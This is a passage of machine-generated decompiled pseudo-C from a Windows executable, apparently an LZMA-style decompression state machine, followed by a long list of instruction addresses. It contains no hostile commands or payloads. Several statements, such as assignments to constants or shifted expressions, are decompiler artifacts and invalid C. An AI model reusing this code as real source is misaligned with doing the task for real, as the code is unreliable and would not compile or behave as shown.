											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040604c
0x0040604c
0x00406051
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x00406053
0x00406053
0x00406057
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406078
0x0040607f
0x00406082
0x0040608d
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x0040609c
0x004060ba
0x004060bc
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062e1
0x004062e4
0x00406287
0x0040628d
0x00000000
0x00000000
0x00000000
0x004062e6
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406284
0x00000000
0x00406284
0x0040609e
0x0040609e
0x004060a1
0x004060a7
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406190
0x00406193
0x0040610a
0x0040610a
0x00406110
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x0040621d
0x00406220
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061c0
0x004061c0
0x00406220
0x00406227
0x00406227
0x00406227
0x0040622b
0x0040622b
0x0040622e
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040611c
0x00000000
0x00000000
0x00000000
0x00406199
0x004060e5
0x004060e9
0x00406856
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406107
0x00000000
0x00406107
0x00406193
0x0040609c
0x00405ed0
0x00405ed0
0x00405ed9
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
